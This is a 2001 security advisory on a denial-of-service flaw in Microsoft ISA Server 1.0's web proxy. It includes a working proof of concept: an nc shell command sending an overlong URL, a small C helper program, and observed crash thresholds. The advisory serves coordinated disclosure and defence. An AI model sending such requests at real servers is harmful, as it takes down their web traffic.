FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2] Denial of Service in Microsoft ISA server v1.0 Summary Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a simple network-based attack which stops all incoming and outgoing web traffic from passing through the firewall until the firewall is rebooted or the affected service is restarted. If the firewall is configured to use the "Web Publishing" feature (inbound HTTP proxy to a web server), this attack can be performed remotely. Details Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is used for both the "publishing" of internal web servers to the external network and for proxying of internal requests to external web servers. Sending a URL with a long pathname component to this proxy will cause it to terminate with an access violation error. For example, sending the (valid) HTTP request: GET http://hostname/aaa[3000 more occurences of 'a'] HTTP/1.0\n\n to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to terminate with an access violation. This can easily be reproduced from a Linux system by using the following simple shell command: printf 'GET http://${HOST}/%s HTTP/1.0\n\n' `./repeat ${x} ${y}` | \ nc ${HOST} 80 where: - printf is the shell utility of that name - ${HOST} is an environment variable set to a hostname which resolves to the external IP of the ISA server - ./repeat is the simple C program whose source is given below - ${x} is the ASCII value of the character to insert into the generated URL - ${y} is the number of repetions of ${x} The `repeat' program can be compiled from the following simple C source: /* * repeat.c -- quick-n-dirty hack to output argv[2] instances of the * character whose ASCII value is given as argv[1] * * WARNING - this has absolutely no error checking! */ #include main (int argc, char **argv) { int character; long repetitions, i; if ( argc != 3 ) { printf("usage: repeat char reps\n"); exit(1); } character = atoi(argv[1]); repetitions = atol(argv[2]); for (i = 0L; i < repetitions; i++) { printf ("%c", character); } } The behaviour of W3PROXY.EXE is dependent both on the value of ${x} and the value of ${y}. With ${x} of 55, the following behavious is observed based on the value of ${y}: 100: processes correctly, returns "404 Object Not Found" from target web server. 200: returns 404 250: returns 404 254: returns 404 255: returns "414 URL Too Long" 260: returns 414 300: returns 414 2000: returns 414 2100: returns 414 2200: returns 414 2300: returns 414 2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and is then terminated with an access violation. 2350: W3PROXY.EXE is terminated on the first attempt. All larger values: as 2350, above. With different values of ${x}, different behaviour is observed for some values of ${y}. This, along with preliminary analyis of the Dr. Watson logs generated upon termination of W3PROXY.EXE, initially suggested that an exploitable overflow may have been present. However, source code analysis by Microsoft has indicated that only a heap overflow is present, and therefore that this vulnerability is not exploitable beyond denial of service. Status Microsoft Corp. was informed of this vulnerability on April 2, 2001. A hotfix to address this issue will be released on April 16, 2001, synchronized with the release of this advisory. Credits Richard Reiner, SecureXpert Labs Graham Wiseman, SecureXpert Labs Matthew Siemens, SecureXpert Labs Kent Nicolson, SecureXpert Labs About SecureXpert DIRECT SecureXpert DIRECT is an advance security advisory service provided to qualified subscribers by SecureXpert Labs. Subscriptions are free of charge and may be obtained at http://www.securexpert.com/services.html.